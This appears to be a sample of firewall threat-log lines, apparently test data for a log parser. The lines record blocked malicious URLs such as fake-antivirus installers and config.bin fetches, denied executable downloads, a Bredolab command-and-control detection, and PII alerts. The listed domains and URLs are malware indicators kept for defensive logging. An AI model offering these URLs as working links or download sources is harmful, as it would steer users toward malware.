09:47:02,01606001116,THREAT,url,1,2012/04/10 
04:39:38,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:39,26534,1,59248,80,0,0,0x200000,tcp,block-url,"sameshitasiteverwas.com/traf/tds/in.cgi?2",(9999),malware-sites,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,Korea Republic Of,0, +Oct 30 09:47:02 1,2012/10/30 09:47:02,01606001116,THREAT,url,1,2012/04/10 04:39:39,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:40,26965,1,59251,80,0,0,0x200000,tcp,block-url,"svarkon.ru/update.exe",(9999),malware-sites,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,Russian Federation,0, +Oct 30 09:47:12 1,2012/10/30 09:47:12,01606001116,THREAT,url,1,2012/04/10 04:39:36,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:37,26076,1,59244,80,0,0,0x200000,tcp,block-url,"onlinescanxpp.com/land/eurl/1.php?code=",(9999),malware-sites,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0, +Oct 30 09:47:17 1,2012/10/30 09:47:17,01606001116,THREAT,url,1,2012/04/10 04:39:34,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:35,26198,1,59237,80,0,0,0x200000,tcp,block-url,"nolagtime.com/conn/?JKV_1RWbUUdIfRUWUaITfdIfbREdYEYdfTTRI-6XBB_1WQR-6GF5_1AU-6LC6_1Y-gW-gEUQQ-gE-tsDF6K5D_rpX51_rR-t-66FC_1Q_fQ_fQ_fQ_fQ_fQ_fQ_fQ-62BG_1Q-672V_1YOR-6N8J_1Q-6252_1WQRR-69LV_1-65GZ_1W-6",(9999),malware-sites,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0, +Oct 30 09:47:17 1,2012/10/30 09:47:17,01606001116,THREAT,url,1,2012/04/10 04:39:35,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 
04:39:36,26056,1,59238,80,0,0,0x200000,tcp,block-url,"nolagtime.com/gwc.txt",(9999),malware-sites,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0, +Oct 30 09:51:03 1,2012/10/30 09:51:03,01606001116,THREAT,url,1,2012/04/10 04:38:19,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:38:20,25465,1,59010,80,0,0,0x200000,tcp,block-url,"karavan.us/bon/index.php",(9999),unknown,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0, +Oct 30 09:51:23 1,2012/10/30 09:51:23,01606001116,THREAT,url,1,2012/04/10 04:38:14,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:38:15,24316,1,58969,80,0,0,0x200000,tcp,block-url,"findnolimits.com/go.php?sid=1",(9999),dead-sites,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0, +Oct 30 09:51:33 1,2012/10/30 09:51:33,01606001116,THREAT,url,1,2012/04/10 04:38:12,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:38:13,17258,1,58941,80,0,0,0x200000,tcp,block-url,"bizoplata.ru/moun.html",(9999),parked-domains,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,Russian Federation,0, +Oct 30 09:51:33 1,2012/10/30 09:51:33,01606001116,THREAT,url,1,2012/04/10 04:38:12,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:38:13,24735,1,58942,80,0,0,0x200000,tcp,block-url,"bizoplata.ru/palast.html",(9999),parked-domains,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,Russian Federation,0, +Oct 30 09:53:33 1,2012/10/30 09:53:33,01606001116,THREAT,spyware,1,2012/04/10 
04:37:28,175.16.199.1,192.168.0.2,0.0.0.0,0.0.0.0,rule1,,crusher,web-browsing,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:37:33,23497,1,80,58849,0,0,0x200000,tcp,drop-all-packets,"controller.php",Bredolab.Gen Command and Control Traffic(13024),any,critical,server-to-client,0,0x0,United States,192.168.0.0-192.168.255.255,0, +Oct 30 09:53:38 1,2012/10/30 09:53:38,01606001116,THREAT,url,1,2012/04/10 04:37:32,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:37:32,23711,1,58856,80,0,0,0x200000,tcp,block-url,"www.15min.it/",(9999),malware-sites,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,Canada,0, +Oct 30 09:53:48 1,2012/10/30 09:53:48,01606001116,THREAT,url,1,2012/04/10 04:37:27,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:37:27,23659,1,58847,80,0,0,0x200000,tcp,block-url,"tubemov.com/",(9999),adult-and-pornography,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0, +Oct 30 09:53:58 1,2012/10/30 09:53:58,01606001116,THREAT,url,1,2012/04/10 04:37:25,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:37:25,23782,1,58841,80,0,0,0x200000,tcp,block-url,"pagesinxt.com/?dn=teenstube.us&flrdr=yes&nxte=js",(9999),malware-sites,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,Virgin Islands British,0, +Oct 30 09:55:23 1,2012/10/30 09:55:23,01606001116,THREAT,url,1,2012/04/10 04:37:05,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:37:06,23239,1,58795,80,0,0,0x200000,tcp,block-url,"movfree.com/",(9999),spyware-and-adware,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0, +Oct 30 09:56:23 1,2012/10/30 
09:56:23,01606001116,THREAT,url,1,2012/04/10 04:36:51,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:36:52,22479,1,58753,80,0,0,0x200000,tcp,block-url,"gometascan.com/",(9999),malware-sites,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0, +Oct 30 09:57:33 1,2012/10/30 09:57:33,01606001116,THREAT,url,1,2012/04/10 04:36:39,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:36:40,21458,1,58708,80,0,0,0x200000,tcp,block-url,"antivirus-powerful-scannerv2.com/download/Install_11-1.exe",(9999),malware-sites,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0, +Oct 30 09:57:38 1,2012/10/30 09:57:38,01606001116,THREAT,url,1,2012/04/10 04:36:38,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:36:39,21577,1,58707,80,0,0,0x200000,tcp,block-url,"antivirus-powerful-scannerv2.com/1/?id=11-1&back==TQzyDTyMUQNMI=N",(9999),malware-sites,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0, +Mar 25 23:58:52 1,2013/03/25 23:58:52,1606001116,THREAT,url,1,2012/04/10 04:36:27,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:36:28,21487,1,58603,80,0,0,0x200000,tcp,block-url,"basdzsdas.com/poker/config.bin",(9999),malware-sites,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0, +Mar 25 23:58:52 1,2013/03/25 23:58:52,1606001116,THREAT,url,1,2012/04/10 04:36:27,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 
04:36:28,21487,1,58603,80,0,0,0x200000,tcp,block-url,"basdzsdas.com/poker/config.bin",(9999),malware-sites,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0, +Mar 25 23:58:57 1,2013/03/25 23:58:57,1606001116,THREAT,file,1,2012/04/10 04:19:59,175.16.199.1,192.168.0.2,0.0.0.0,0.0.0.0,rule1,,crusher,web-browsing,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:20:05,64856,1,80,54431,0,0,0x200000,tcp,deny,"uLLGRaXP.exe",Windows Executable (EXE)(52020),any,low,server-to-client,0,0x0,United States,192.168.0.0-192.168.255.255,0, +Mar 25 23:58:57 1,2013/03/25 23:58:57,1606001116,THREAT,url,1,2012/04/10 04:36:27,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:36:28,21487,1,58603,80,0,0,0x200000,tcp,block-url,"basdzsdas.com/poker/config.bin",(9999),malware-sites,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0, +Mar 25 23:59:07 1,2013/03/25 23:59:07,01606001116,THREAT,file,1,2012/04/10 04:51:29,175.16.199.1,192.168.0.2,0.0.0.0,0.0.0.0,rule1,,crusher,web-browsing,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:51:34,37983,1,80,61220,0,0,0x200000,tcp,deny,"FunkyEmoticons_setup.exe",Windows Executable (EXE)(52020),any,low,server-to-client,0,0x0,European Union,192.168.0.0-192.168.255.255,0, +Mar 25 23:59:07 1,2013/03/25 23:59:07,01606001116,THREAT,file,1,2012/04/10 04:54:33,175.16.199.1,192.168.0.2,0.0.0.0,0.0.0.0,rule1,,crusher,web-browsing,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:54:38,41989,1,80,61726,0,0,0x200000,tcp,deny,"52hxw.exe",Windows Executable (EXE)(52020),any,low,server-to-client,0,0x0,China,192.168.0.0-192.168.255.255,0, +Mar 25 23:59:07 1,2013/03/25 23:59:07,01606001116,THREAT,url,1,2012/04/10 05:01:00,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 
05:01:00,49238,1,63007,80,0,0,0x200000,tcp,block-url,"softsellfast.com/test/config.bin",(9999),malware-sites,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0, +Mar 25 23:59:12 1,2013/03/25 23:59:12,01606001116,THREAT,file,1,2012/04/10 04:45:17,175.16.199.1,192.168.0.2,0.0.0.0,0.0.0.0,rule1,,crusher,web-browsing,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:45:23,21592,1,80,60212,0,0,0x200000,tcp,deny,"setup.exe",Windows Executable (EXE)(52020),any,low,server-to-client,0,0x0,Netherlands,192.168.0.0-192.168.255.255,0, +Mar 25 23:59:12 1,2013/03/25 23:59:12,01606001116,THREAT,file,1,2012/04/10 04:46:16,175.16.199.1,192.168.0.2,0.0.0.0,0.0.0.0,rule1,,crusher,web-browsing,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:46:22,33760,1,80,60392,0,0,0x200000,tcp,deny,"Live-Player_setup.exe",Windows Executable (EXE)(52020),any,low,server-to-client,0,0x0,European Union,192.168.0.0-192.168.255.255,0, +Mar 25 23:59:12 1,2013/03/25 23:59:12,01606001116,THREAT,url,1,2012/04/10 04:42:39,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:42:39,28723,1,59709,80,0,0,0x200000,tcp,block-url,"boialex.narod.ru/config.txt",(9999),malware-sites,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,Russian Federation,0, +Mar 25 23:59:12 1,2013/03/25 23:59:12,01606001116,THREAT,url,1,2012/04/10 04:42:42,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:42:42,28932,1,59721,80,0,0,0x200000,tcp,block-url,"edw-melon.narod.ru/config.txt",(9999),malware-sites,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,Russian Federation,0, +Mar 25 23:59:12 1,2013/03/25 23:59:12,01606001116,THREAT,url,1,2012/04/10 
04:42:51,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:42:51,28953,1,59752,80,0,0,0x200000,tcp,block-url,"maximtushin.narod.ru/config.txt",(9999),malware-sites,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,Russian Federation,0, +Mar 25 23:59:17 1,2013/03/25 23:59:17,01606001116,THREAT,file,1,2012/04/10 04:19:59,175.16.199.1,192.168.0.2,0.0.0.0,0.0.0.0,rule1,,crusher,web-browsing,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:20:05,64856,1,80,54431,0,0,0x200000,tcp,deny,"uLLGRaXP.exe",Windows Executable (EXE)(52020),any,low,server-to-client,0,0x0,United States,192.168.0.0-192.168.255.255,0, +Mar 25 23:59:22 1,2013/03/25 23:59:22,01606001116,THREAT,url,1,2012/04/10 04:09:01,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:09:01,55402,1,63183,80,0,0,0x200000,tcp,block-url,"marketingsoluchion.biz/fkn/config.bin",(9999),unknown,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0, +Mar 25 23:59:32 1,2013/03/25 23:59:32,01606001116,THREAT,data,1,2012/04/09 08:18:27,192.168.0.6,175.16.199.1,0.0.0.0,0.0.0.0,rule1,jordy,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/09 08:18:32,25217,1,1047,80,0,0,0x200000,tcp,alert,"default.aspx",PII(60000),any,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0, +Mar 25 23:59:32 1,2013/03/25 23:59:32,01606001116,THREAT,data,1,2012/04/09 08:18:29,175.16.199.1,192.168.0.6,0.0.0.0,0.0.0.0,rule1,,jordy,web-browsing,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/09 08:18:34,25653,1,80,1039,0,0,0x200000,tcp,alert,"sck.aspx",PII(60000),any,informational,server-to-client,0,0x0,United States,192.168.0.0-192.168.255.255,0, +Mar 25 23:59:32 1,2013/03/25 23:59:32,01606001116,THREAT,data,1,2012/04/09 
08:18:32,175.16.199.1,192.168.0.6,0.0.0.0,0.0.0.0,rule1,,jordy,web-browsing,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/09 08:18:37,25717,3,80,1064,0,0,0x200000,tcp,alert,"ADSAdClient31.dll",PII(60000),any,informational,server-to-client,0,0x0,United States,192.168.0.0-192.168.255.255,0, +Mar 25 23:59:32 1,2013/03/25 23:59:32,01606001116,THREAT,data,1,2012/04/09 08:18:33,192.168.0.6,175.16.199.1,0.0.0.0,0.0.0.0,rule1,jordy,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/09 08:18:38,25290,1,1048,80,0,0,0x200000,tcp,alert,"c.gif",PII(60000),any,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0, +Mar 25 23:59:32 1,2013/03/25 23:59:32,01606001116,THREAT,data,1,2012/04/09 08:18:37,175.16.199.1,192.168.0.6,0.0.0.0,0.0.0.0,rule1,,jordy,web-browsing,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/09 08:18:42,25932,1,80,1071,0,0,0x200000,tcp,alert,"csi",PII(60000),any,informational,server-to-client,0,0x0,United States,192.168.0.0-192.168.255.255,0, +Mar 25 23:59:32 1,2013/03/25 23:59:32,01606001116,THREAT,data,1,2012/04/09 08:50:12,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,picard,,pandora,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/09 08:50:17,28264,1,57502,80,0,0,0x200000,tcp,alert,"internal-tuner.pandora.com",PII(60000),any,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0, +Mar 25 23:59:32 1,2013/03/25 23:59:32,01606001116,THREAT,data,1,2012/04/09 08:58:18,175.16.199.1,192.168.0.2,0.0.0.0,0.0.0.0,rule1,,picard,google-maps,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/09 08:58:22,29312,1,80,57876,0,0,0x200000,tcp,reset-both,"js",PII(60000),any,informational,server-to-client,0,0x0,United States,192.168.0.0-192.168.255.255,0, +Mar 25 23:59:32 1,2013/03/25 23:59:32,01606001116,THREAT,file,1,2012/04/09 
08:22:27,175.16.199.1,192.168.0.6,0.0.0.0,0.0.0.0,rule1,,jordy,web-browsing,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/09 08:22:31,26747,1,80,1082,0,0,0x200000,tcp,deny,"about.exe",Windows Executable (EXE)(52020),any,low,server-to-client,0,0x0,Ukraine,192.168.0.0-192.168.255.255,0, +Mar 25 23:59:37 1,2013/03/25 23:59:37,01606001116,THREAT,data,1,2012/04/09 07:11:43,175.16.199.1,192.168.0.2,0.0.0.0,0.0.0.0,rule1,,picard,google-maps,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/09 07:11:48,19205,1,80,50986,0,0,0x200000,tcp,reset-both,"js",PII(60000),any,informational,server-to-client,0,0x0,United States,192.168.0.0-192.168.255.255,0, +Mar 25 23:59:37 1,2013/03/25 23:59:37,01606001116,THREAT,data,1,2012/04/09 07:14:02,175.16.199.1,192.168.0.2,0.0.0.0,0.0.0.0,rule1,,picard,google-maps,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/09 07:14:07,19360,1,80,51716,0,0,0x200000,tcp,reset-both,"js",PII(60000),any,informational,server-to-client,0,0x0,United States,192.168.0.0-192.168.255.255,0, +Mar 25 23:59:37 1,2013/03/25 23:59:37,01606001116,THREAT,data,1,2012/04/09 07:14:39,175.16.199.1,192.168.0.2,0.0.0.0,0.0.0.0,rule1,,picard,google-maps,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/09 07:14:44,19696,1,80,52119,0,0,0x200000,tcp,reset-both,"js",PII(60000),any,informational,server-to-client,0,0x0,United States,192.168.0.0-192.168.255.255,0, +Mar 25 23:59:37 1,2013/03/25 23:59:37,01606001116,THREAT,data,1,2012/04/09 07:16:03,175.16.199.1,192.168.0.2,0.0.0.0,0.0.0.0,rule1,,picard,google-maps,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/09 07:16:08,19679,1,80,52411,0,0,0x200000,tcp,reset-both,"js",PII(60000),any,informational,server-to-client,0,0x0,United States,192.168.0.0-192.168.255.255,0, +Mar 25 23:59:37 1,2013/03/25 23:59:37,01606001116,THREAT,data,1,2012/04/09 
07:18:14,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,picard,,google-analytics,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/09 07:18:19,19448,1,52366,80,0,0,0x200000,tcp,alert,"__utm.gif",PII(60000),any,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0, +Mar 25 23:59:37 1,2013/03/25 23:59:37,01606001116,THREAT,data,1,2012/04/09 07:25:04,175.16.199.1,192.168.0.2,0.0.0.0,0.0.0.0,rule1,,picard,google-maps,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/09 07:25:09,20422,1,80,53026,0,0,0x200000,tcp,reset-both,"js",PII(60000),any,informational,server-to-client,0,0x0,United States,192.168.0.0-192.168.255.255,0, +Mar 25 23:59:37 1,2013/03/25 23:59:37,01606001116,THREAT,data,1,2012/04/09 07:36:04,175.16.199.1,192.168.0.2,0.0.0.0,0.0.0.0,rule1,,picard,web-browsing,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/09 07:36:09,21267,1,80,53809,0,0,0x200000,tcp,alert,"nav_logo107.png",PII(60000),any,informational,server-to-client,0,0x0,United States,192.168.0.0-192.168.255.255,0, +Mar 25 23:59:37 1,2013/03/25 23:59:37,01606001116,THREAT,data,1,2012/04/09 08:08:08,175.16.199.1,192.168.0.2,0.0.0.0,0.0.0.0,rule1,,picard,web-browsing,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/09 08:08:13,24567,1,80,55912,0,0,0x200000,tcp,alert,"Eadweard_Muybridge",PII(60000),any,informational,server-to-client,0,0x0,United States,192.168.0.0-192.168.255.255,0, +Mar 25 23:59:37 1,2013/03/25 23:59:37,01606001116,THREAT,data,1,2012/04/09 08:08:44,175.16.199.1,192.168.0.2,0.0.0.0,0.0.0.0,rule1,,picard,web-browsing,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/09 08:08:49,24646,1,80,55916,0,0,0x200000,tcp,alert,"load.php",PII(60000),any,informational,server-to-client,0,0x0,United States,192.168.0.0-192.168.255.255,0, +Mar 25 23:59:37 1,2013/03/25 23:59:37,01606001116,THREAT,data,1,2012/04/09 
08:16:57,175.16.199.1,192.168.0.6,0.0.0.0,0.0.0.0,rule1,,jordy,web-browsing,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/09 08:17:01,25874,1,80,1046,0,0,0x200000,tcp,reset-both,"8fe44cb728c0f40750c64ee906eb72.css",PII(60000),any,informational,server-to-client,0,0x0,United States,192.168.0.0-192.168.255.255,0, +Mar 25 23:59:42 1,2013/03/25 23:59:42,01606001116,THREAT,data,1,2012/04/09 04:06:41,175.16.199.1,192.168.0.2,0.0.0.0,0.0.0.0,rule1,,jordy,google-maps,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/09 04:06:46,2175,1,80,61734,0,0,0x200000,tcp,reset-both,"js",PII(60000),any,informational,server-to-client,0,0x0,United States,192.168.0.0-192.168.255.255,0, +Mar 25 23:59:42 1,2013/03/25 23:59:42,01606001116,THREAT,data,1,2012/04/09 04:12:52,175.16.199.1,192.168.0.2,0.0.0.0,0.0.0.0,rule1,,jordy,google-maps,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/09 04:12:57,3046,1,80,62292,0,0,0x200000,tcp,reset-both,"js",PII(60000),any,informational,server-to-client,0,0x0,United States,192.168.0.0-192.168.255.255,0, +Mar 25 23:59:42 1,2013/03/25 23:59:42,01606001116,THREAT,data,1,2012/04/09 06:07:49,175.16.199.1,192.168.0.2,0.0.0.0,0.0.0.0,rule1,,jordy,rss,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/09 06:07:54,1560,1,80,64669,0,0,0x200000,tcp,alert,"appcast.xml",PII(60000),any,informational,server-to-client,0,0x0,United States,192.168.0.0-192.168.255.255,0, +Mar 25 23:59:42 1,2013/03/25 23:59:42,01606001116,THREAT,data,1,2012/04/09 06:48:44,175.16.199.1,192.168.0.2,0.0.0.0,0.0.0.0,rule1,,picard,google-maps,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/09 06:48:48,16852,1,80,65265,0,0,0x200000,tcp,reset-both,"js",PII(60000),any,informational,server-to-client,0,0x0,United States,192.168.0.0-192.168.255.255,0, +Mar 25 23:59:42 1,2013/03/25 23:59:42,01606001116,THREAT,data,1,2012/04/09 
06:48:59,175.16.199.1,192.168.0.2,0.0.0.0,0.0.0.0,rule1,,picard,web-browsing,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/09 06:49:05,15948,1,80,64979,0,0,0x200000,tcp,alert,"csi",PII(60000),any,informational,server-to-client,0,0x0,United States,192.168.0.0-192.168.255.255,0, +Mar 25 23:59:42 1,2013/03/25 23:59:42,01606001116,THREAT,data,1,2012/04/09 06:50:14,175.16.199.1,192.168.0.2,0.0.0.0,0.0.0.0,rule1,,picard,web-browsing,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/09 06:50:19,17028,1,80,49432,0,0,0x200000,tcp,alert,"index.php",PII(60000),any,informational,server-to-client,0,0x0,United States,192.168.0.0-192.168.255.255,0, +Mar 25 23:59:42 1,2013/03/25 23:59:42,01606001116,THREAT,data,1,2012/04/09 06:51:34,175.16.199.1,192.168.0.2,0.0.0.0,0.0.0.0,rule1,,picard,google-maps,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/09 06:51:39,15878,1,80,49722,0,0,0x200000,tcp,reset-both,"js",PII(60000),any,informational,server-to-client,0,0x0,United States,192.168.0.0-192.168.255.255,0, +Mar 25 23:59:42 1,2013/03/25 23:59:42,01606001116,THREAT,data,1,2012/04/09 06:53:41,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,picard,,google-analytics,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/09 06:53:47,16602,1,49681,80,0,0,0x200000,tcp,alert,"__utm.gif",PII(60000),any,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0, +Mar 25 23:59:42 1,2013/03/25 23:59:42,01606001116,THREAT,data,1,2012/04/09 06:54:35,175.16.199.1,192.168.0.2,0.0.0.0,0.0.0.0,rule1,,picard,google-maps,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/09 06:54:41,17433,1,80,50108,0,0,0x200000,tcp,reset-both,"js",PII(60000),any,informational,server-to-client,0,0x0,United States,192.168.0.0-192.168.255.255,0, +Mar 25 23:59:42 1,2013/03/25 23:59:42,01606001116,THREAT,data,1,2012/04/09 
06:54:55,175.16.199.1,192.168.0.2,0.0.0.0,0.0.0.0,rule1,,picard,google-maps,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/09 06:55:00,17104,1,80,50387,0,0,0x200000,tcp,reset-both,"js",PII(60000),any,informational,server-to-client,0,0x0,United States,192.168.0.0-192.168.255.255,0, +Mar 25 23:59:47 1,2013/03/25 23:59:47,01606001116,THREAT,data,1,2012/04/09 03:44:49,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,jordy,,pandora,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/09 03:44:55,63706,1,59781,80,0,0,0x200000,tcp,alert,"internal-tuner.pandora.com",PII(60000),any,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0, +Mar 25 23:59:47 1,2013/03/25 23:59:47,01606001116,THREAT,data,1,2012/04/09 03:45:45,175.16.199.1,192.168.0.2,0.0.0.0,0.0.0.0,rule1,,jordy,google-maps,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/09 03:45:50,65257,1,80,60005,0,0,0x200000,tcp,reset-both,"js",PII(60000),any,informational,server-to-client,0,0x0,United States,192.168.0.0-192.168.255.255,0, +Mar 25 23:59:47 1,2013/03/25 23:59:47,01606001116,THREAT,data,1,2012/04/09 03:49:17,175.16.199.1,192.168.0.2,0.0.0.0,0.0.0.0,rule1,,jordy,google-maps,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/09 03:49:22,537,1,80,60443,0,0,0x200000,tcp,reset-both,"js",PII(60000),any,informational,server-to-client,0,0x0,United States,192.168.0.0-192.168.255.255,0, +Mar 25 23:59:47 1,2013/03/25 23:59:47,01606001116,THREAT,data,1,2012/04/09 03:53:41,175.16.199.1,192.168.0.2,0.0.0.0,0.0.0.0,rule1,,jordy,google-maps,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/09 03:53:45,914,1,80,60822,0,0,0x200000,tcp,reset-both,"js",PII(60000),any,informational,server-to-client,0,0x0,United States,192.168.0.0-192.168.255.255,0, +Mar 25 23:59:47 1,2013/03/25 23:59:47,01606001116,THREAT,data,1,2012/04/09 
